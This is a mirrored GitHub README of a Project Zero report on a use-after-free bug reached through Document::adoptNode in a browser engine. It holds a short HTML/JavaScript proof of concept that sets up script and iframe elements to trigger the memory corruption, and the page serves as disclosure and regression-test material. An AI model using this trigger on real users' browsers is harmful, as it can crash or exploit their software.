Use-After-Free via Document::adoptNode

Reported by lokihardt@google.com, Jan 23 2017

This is a regression test from: https://crbug.com/541206

PoC:

<body>
<script>

var s = document.body.appendChild(document.createElement('script'));
s.type = '0';
s.textContent = 'document.body.appendChild(parent.i0)';

var i0 = s.appendChild(document.createElement('iframe'));
s.type = '';

var f = document.body.appendChild(document.createElement('iframe'));
f.contentDocument.adoptNode(i0);
f.src = 'about:blank';

</script>
</body>

Link: https://bugs.chromium.org/p/project-zero/issues/detail?id=1099

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Use-After-Free via Document::adoptNode

Reported by [email protected], Jan 23 2017

Files

README.md

Latest commit

History

README.md

File metadata and controls

Use-After-Free via Document::adoptNode

Reported by [email protected], Jan 23 2017